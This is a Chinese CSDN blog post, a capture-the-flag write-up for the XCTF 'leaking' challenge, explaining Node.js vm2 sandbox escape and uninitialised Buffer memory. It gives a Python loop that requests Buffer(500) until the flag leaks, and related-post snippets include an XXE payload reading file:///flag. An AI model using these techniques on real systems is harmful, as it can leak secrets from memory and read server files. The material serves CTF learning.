攻防世界 web高级 leaking

最新推荐文章于 2022-06-24 16:53:00 发布
最新推荐文章于 2022-06-24 16:53:00 发布
阅读量675 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beihai2013/article/details/112788590
版权

考察:node.js逃逸

参考:

https://blog.csdn.net/weixin_44037296/article/details/112387663

https://blog.csdn.net/weixin_46676743/article/details/112669105

不知道咋说,直接抄源码

# encoding=utf-8

import requests
import time
url = 'http://220.249.52.134:41148/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(response)
            break



flag{4nother_h34rtbleed_in_n0dejs}

node.js下的vm

一种隔离运行代码的沙箱,可以隔离当前环境上下文,但能访问当前上下文中的global变量

node.js下的沙箱逃逸

由于js原型链的原因,可以通过contructor寻找变量prototype的方式,从而执行Function,达到沙箱逃逸的效果

node下的Buffer

在较早一点的node.js版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。

beihai2013
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Gradient Inversion Attack Leaking Private Labels in Two-Party Sp
01-03
Gradient Inversion Attack Leaking Private Labels in Two-Party Split Learning_两方分裂学习中泄漏私有标签的梯度反转攻击.pdf
XCTF Leaking
m0_64898960的博客
04-08 1557
[HITCON2016]Leaking
xctf攻防世界Leaking wp
sash1mi
01-15 1673
访问题目地址 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { .
攻防世界 WEB leaking
qq_41696858的博客
08-25 355
这题考的是node.js沙箱逃逸,之前没遇到过,属于是又学到新知识了 具体看这一篇,https://juejin.cn/post/6889226643525599240 简单说一下原理吧,就是理论上沙箱里的代码只能与vm上下文打交道,可是vm上下文确是可以与沙箱外的代码和变量打交道的,因此,如果我们能够构造请求, 使得vm上下文代替我们去读取利用沙箱外的代码和变量的话,那就形成了沙箱逃逸,拿这一题来举个例吧 先看一下代码 "use strict"; var randomstring = require("
xctf攻防世界 Web高手进阶区 leaking
l8947943的博客
01-01 1623
1. 进入环境,查看内容,给了一堆代码 看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释: /* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\"
攻防世界 web高手进阶区 5分题 leaking
闵行小鱼塘
04-14 605
攻防世界web高手进阶区的5分题,本篇是leaking的writeup
Cisco-Fusion-Router-IOS-XE-route-leaking-guide from yuanshou
最新发布
06-17
Cisco_Fusion_Router_IOS_XE_route-leaking_guide from yuanshou
private-leaking-investigation:用于演示 AngularJS 内存泄漏的示例应用程序
06-18
私人泄密调查 用于演示 AngularJS 内存泄漏的示例应用程序
RSA 2018PPT汇总(108份).zip
01-03
the-path-to-successful-detection.pdf', 'asec-t08-leaking-ads-is-user-data-truly-secure.pdf', 'asec-t10-realizing-software-security-maturity-the-growing-pains-and-gains.pdf', 'asec-w04-derived-unique-...
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure.pdf
08-21
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure 金融安全 安全研究 安全编码 安全审计 漏洞挖掘
攻防世界 web leaking
Zeker62的博客
09-08 185
https://blog.csdn.net/weixin_46676743/article/details/112669105
攻防世界xctfwebleaking题解
qq_60787987的博客
03-13 5866
11打开网站我们可以看到如下代码: 正在上传… 重新上传 取消
攻防世界-leaking-(详细操作)做题过程
qq_43715020的博客
06-18 254
攻防世界-leaking-(详细操作)做题过程
xctf攻防世界unagi wp
sash1mi
02-19 574
xctf攻防世界unagi wp 访问题目地址 点击Upload下的here 从信息提示中可以知道要通过编写xml文件上传 即通过XXE编码转换成utf-16编码绕过 可以利用vim编辑xml文件(取名为2.xml)代码如下: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user>
攻防世界Webleaking
Light_inthe_eyes的博客
10-16 120
打开网页,代码审计,通过vm能猜测是关于node.js沙箱逃逸: "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/"
XCTF Web 记录(unagi)
ximo的博客
03-09 342
unagi 打开页面,四个跳转。 一个提示页面: 一个利用方式提示: 一个利用点: 利用方式: XXE注入。 构造XXE注入代码: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <pa
攻防世界——leaking
m0_62063669的博客
06-24 274
攻防世界——leaking进入环境,给了一段代码浅谈npm,vm,vm2,Node.js沙盒逃逸这是一题是关于Node.js沙盒逃逸的。其中var { VM } = require(“vm2”);是Node.js 官方安全沙箱的库(是Node.js有关沙盒的代码)低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么可以构造paylaod来读取内存 req.query.data.length 的限制可以通过传入数组绕过1.题目通过访问得到了一串代码,这段代码提示在沙箱中.
攻防世界web解题[进阶](六)
weixin_46703850的博客
03-10 579
攻防世界web解题[进阶](六)
xctf攻防世界smarthacker wp
sash1mi
02-19 428
xctf攻防世界smarthacker wp 考察知识点:源码泄露 python脚本 访问题目地址 下载www.tar.gz 我直呼好家伙,三千多个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,猜测这几千个php文件中肯定含有可以使用的shell,只有写脚本去试了 掏出脚本: import requests import os import re import threading import time requests.adapters.DEFAULT_
Leaking Caffe2 thread-pool after fork.
05-23
这个错误通常是由于在主进程中创建了Caffe2线程池,但在子进程中没有正确地清理它所引起的。这可能会导致子进程中的线程池泄漏,从而导致性能下降或其他问题。 要解决此问题,您可以在fork之后立即清理Caffe2线程池,以确保子进程没有任何遗留的线程池。您可以使用以下代码片段来清理线程池: ```c++ #include <caffe2/utils/threadpool/pthreadpool-cpp.h> void cleanup_threadpool() { caffe2::pthreadpool* pool = caffe2::pthreadpool(); if (pool != nullptr) { pool->finish(); } } ``` 在您的fork调用后,立即调用此函数以清理Caffe2线程池。这应该解决您遇到的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值